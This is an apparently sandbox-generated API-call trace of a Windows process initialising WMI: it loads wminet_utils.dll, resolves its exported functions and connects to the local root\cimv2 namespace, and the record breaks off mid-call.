WbemLocator:IUnknown:AddRef (This=0x596da8) returned 0x3 [0157.159] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4f4ec5c | out: ppvObject=0x4f4ec5c*=0x0) returned 0x80004002 [0157.159] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4f4ec0c | out: ppvObject=0x4f4ec0c*=0x0) returned 0x80004002 [0157.159] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4ec18 | out: ppvObject=0x4f4ec18*=0x0) returned 0x80004002 [0157.159] CoGetContextToken (in: pToken=0x4f4ec78 | out: pToken=0x4f4ec78) returned 0x0 [0157.159] CoGetObjectContext (in: riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x59ad04 | out: ppv=0x59ad04*=0x524148) returned 0x0 [0157.161] CoGetContextToken (in: pToken=0x4f4f080 | out: pToken=0x4f4f080) returned 0x0 [0157.161] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f10c | out: ppvObject=0x4f4f10c*=0x0) returned 0x80004002 [0157.161] WbemLocator:IUnknown:Release (This=0x596da8) returned 0x2 [0157.161] WbemLocator:IUnknown:Release (This=0x596da8) returned 0x1 [0157.162] CoGetContextToken (in: pToken=0x4f4f708 | out: pToken=0x4f4f708) returned 0x0 [0157.162] CoGetContextToken (in: pToken=0x4f4f668 | out: pToken=0x4f4f668) returned 0x0 [0157.162] WbemLocator:IUnknown:QueryInterface (in: This=0x596da8, riid=0x4f4f738*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x4f4f734 | out: ppvObject=0x4f4f734*=0x596da8) returned 0x0 [0157.162] WbemLocator:IUnknown:AddRef (This=0x596da8) returned 0x3 [0157.162] WbemLocator:IUnknown:Release (This=0x596da8) returned 0x2 [0157.167] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594580, puCount=0x4f4f8cc | out: puCount=0x4f4f8cc*=0x2) returned 0x0 [0157.167] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=8, puBuffLength=0x4f4f8c8*=0x0, pszText=0x0 | out: puBuffLength=0x4f4f8c8*=0xf, pszText=0x0) returned 0x0 [0157.167] WbemDefPath:IWbemPath:GetText (in: This=0x594580, lFlags=8, puBuffLength=0x4f4f8c8*=0xf, pszText="00000000000000" | out: puBuffLength=0x4f4f8c8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x4f4eb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0157.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x4f4f048, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0157.178] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x65a60000 [0157.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x4f4f07c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity \x8ae\x8cpÆ=(ú7iHóô\x04\x01", lpUsedDefaultChar=0x0) returned 13 [0157.353] GetProcAddress (hModule=0x65a60000, lpProcName="ResetSecurity") returned 0x65a62cc0 [0157.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x4f4f07c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0157.362] GetProcAddress (hModule=0x65a60000, lpProcName="SetSecurity") returned 0x65a62d10 [0157.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x4f4f078, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 18 [0157.370] GetProcAddress (hModule=0x65a60000, lpProcName="BlessIWbemServices") returned 0x65a62090 [0157.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x4f4f070, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 24 [0157.403] GetProcAddress (hModule=0x65a60000, lpProcName="BlessIWbemServicesObject") returned 0x65a620f0 [0157.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x4f4f078, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 17 [0157.428] GetProcAddress (hModule=0x65a60000, lpProcName="GetPropertyHandle") returned 0x65a627a0 [0157.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x4f4f078, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 18 [0157.443] GetProcAddress (hModule=0x65a60000, lpProcName="WritePropertyValue") returned 0x65a62e50 [0157.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4f4f084, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 5 [0157.469] GetProcAddress (hModule=0x65a60000, lpProcName="Clone") returned 0x65a62150 [0157.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x4f4f078, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0157.480] GetProcAddress (hModule=0x65a60000, lpProcName="VerifyClientKey") returned 0x65a62e00 [0157.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x4f4f078, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0157.486] GetProcAddress (hModule=0x65a60000, lpProcName="GetQualifierSet") returned 0x65a62860 [0157.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x4f4f084, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0157.487] GetProcAddress (hModule=0x65a60000, lpProcName="Get") returned 0x65a62630 [0157.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x4f4f084, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0157.531] GetProcAddress (hModule=0x65a60000, lpProcName="Put") returned 0x65a62970 [0157.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x4f4f084, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 6 [0157.548] GetProcAddress (hModule=0x65a60000, lpProcName="Delete") returned 0x65a62410 [0157.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x4f4f080, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 8 [0157.564] GetProcAddress (hModule=0x65a60000, lpProcName="GetNames") returned 0x65a62740 [0157.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x4f4f078, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumeration´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 16 [0157.585] GetProcAddress (hModule=0x65a60000, lpProcName="BeginEnumeration") returned 0x65a62050 [0157.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x4f4f084, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 4 [0157.611] GetProcAddress (hModule=0x65a60000, lpProcName="Next") returned 0x65a62910 [0157.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x4f4f07c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 14 [0157.627] GetProcAddress (hModule=0x65a60000, lpProcName="EndEnumeration") returned 0x65a624d0 [0157.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x4f4f070, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0157.635] GetProcAddress (hModule=0x65a60000, lpProcName="GetPropertyQualifierSet") returned 0x65a62830 [0157.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x4f4f084, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 5 [0157.654] GetProcAddress (hModule=0x65a60000, lpProcName="Clone") returned 0x65a62150 [0157.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x4f4f07c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 13 [0157.654] GetProcAddress (hModule=0x65a60000, lpProcName="GetObjectText") returned 0x65a62770 [0157.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x4f4f078, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 17 [0157.665] GetProcAddress (hModule=0x65a60000, lpProcName="SpawnDerivedClass") returned 0x65a62d60 [0157.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x4f4f07c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 13 [0157.675] GetProcAddress (hModule=0x65a60000, lpProcName="SpawnInstance") returned 0x65a62d90 [0157.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x4f4f080, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 9 [0157.676] GetProcAddress (hModule=0x65a60000, lpProcName="CompareTo") returned 0x65a62200 [0157.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x4f4f078, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 17 [0157.698] GetProcAddress (hModule=0x65a60000, lpProcName="GetPropertyOrigin") returned 0x65a62800 [0157.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x4f4f07c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFrom´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 12 [0157.716] GetProcAddress (hModule=0x65a60000, lpProcName="InheritsFrom") returned 0x65a62880 [0157.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x4f4f080, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 9 [0157.718] GetProcAddress (hModule=0x65a60000, lpProcName="GetMethod") returned 0x65a626b0 [0157.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x4f4f080, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 9 [0157.737] GetProcAddress (hModule=0x65a60000, lpProcName="PutMethod") returned 0x65a62ae0 [0157.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x4f4f07c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethod´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 12 [0157.754] GetProcAddress (hModule=0x65a60000, lpProcName="DeleteMethod") returned 0x65a62430 [0157.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x4f4f074, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 22 [0157.755] GetProcAddress (hModule=0x65a60000, lpProcName="BeginMethodEnumeration") returned 0x65a62070 [0157.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x4f4f080, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 10 [0157.757] GetProcAddress (hModule=0x65a60000, lpProcName="NextMethod") returned 0x65a62940 [0157.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x4f4f074, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumeration´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 20 [0157.773] GetProcAddress (hModule=0x65a60000, lpProcName="EndMethodEnumeration") returned 0x65a624f0 [0157.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x4f4f074, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 21 [0157.775] GetProcAddress (hModule=0x65a60000, lpProcName="GetMethodQualifierSet") returned 0x65a62710 [0157.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x4f4f078, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0157.777] GetProcAddress (hModule=0x65a60000, lpProcName="GetMethodOrigin") returned 0x65a626e0 [0157.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x4f4f078, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Get´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 16 [0157.779] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_Get") returned 0x65a62b70 [0157.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x4f4f078, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Put´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 16 [0157.800] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_Put") returned 0x65a62c00 [0157.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x4f4f074, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0157.824] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_Delete") returned 0x65a62b30 [0157.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x4f4f074, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 21 [0157.826] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_GetNames") returned 0x65a62ba0 [0157.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x4f4f06c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 29 [0157.845] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_BeginEnumeration") returned 0x65a62b10 [0157.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x4f4f078, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 17 [0157.846] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_Next") returned 0x65a62bd0 [0157.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x4f4f06c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0157.863] GetProcAddress (hModule=0x65a60000, lpProcName="QualifierSet_EndEnumeration") returned 0x65a62b50 [0157.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x4f4f070, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0157.865] GetProcAddress (hModule=0x65a60000, lpProcName="GetCurrentApartmentType") returned 0x65a62860 [0157.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x4f4f074, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStub´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 20 [0157.877] GetProcAddress (hModule=0x65a60000, lpProcName="GetDemultiplexedStub") returned 0x65a62660 [0157.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x4f4f074, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 21 [0157.895] GetProcAddress (hModule=0x65a60000, lpProcName="CreateInstanceEnumWmi") returned 0x65a62380 [0157.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x4f4f078, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 18 [0157.923] GetProcAddress (hModule=0x65a60000, lpProcName="CreateClassEnumWmi") returned 0x65a622f0 [0157.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x4f4f07c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmi´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 12 [0157.925] GetProcAddress (hModule=0x65a60000, lpProcName="ExecQueryWmi") returned 0x65a625a0 [0157.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x4f4f070, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmi´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 24 [0157.961] GetProcAddress (hModule=0x65a60000, lpProcName="ExecNotificationQueryWmi") returned 0x65a62510 [0157.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x4f4f07c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi\x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 14 [0157.962] GetProcAddress (hModule=0x65a60000, lpProcName="PutInstanceWmi") returned 0x65a62a40 [0157.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x4f4f07c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0157.978] GetProcAddress (hModule=0x65a60000, lpProcName="PutClassWmi") returned 0x65a629a0 [0157.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x4f4f070, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObject´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 24 [0157.980] GetProcAddress (hModule=0x65a60000, lpProcName="CloneEnumWbemClassObject") returned 0x65a62170 [0157.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x4f4f078, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmi´ \x8ae\x8cpÆ=(ú7iHóô\x04", lpUsedDefaultChar=0x0) returned 16 [0157.990] GetProcAddress (hModule=0x65a60000, lpProcName="ConnectServerWmi") returned 0x65a62230 [0158.003] CoCreateInstance (in: rclsid=0x65a613b4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x65a61414*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x4f4f7a4 | out: ppv=0x4f4f7a4*=0x596c58) returned 0x0 [0158.003] WbemLocator:IWbemLocator:ConnectServer (in: This=0x596c58, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x4f4f838 | out: ppNamespace=0x4f4f838*=0x57d6e0) returned 0x0 [0158.033] WbemLocator:IUnknown:QueryInterface (in: This=0x57d6e0, riid=0x65a61234*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4f4f6cc | out: ppvObject=0x4f4f6cc*=0x547fa4) returned 0x0 [0158.033] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x547fa4, pProxy=0x57d6e0, pAuthnSvc=0x4f4f71c, pAuthzSvc=0x4f4f718, pServerPrincName=0x4f4f710, pAuthnLevel=0x4f4f714, pImpLevel=0x4f4f704, pAuthInfo=0x4f4f708, pCapabilites=0x4f4f70c | out: pAuthnSvc=0x4f4f71c*=0xa, pAuthzSvc=0x4f4f718*=0x0, pServerPrincName=0x4f4f710, pAuthnLevel=0x4f4f714*=0x6, pImpLevel=0x4f4f704*=0x2, pAuthInfo=0x4f4f708, pCapabilites=0x4f4f70c*=0x1) returned 0x0 [0158.033] WbemLocator:IUnknown:Release (This=0x547fa4) returned 0x1 [0158.033] WbemLocator:IUnknown:QueryInterface (in: This=0x57d6e0, riid=0x65a61224*(Data1=0x0, Data2=0x0, 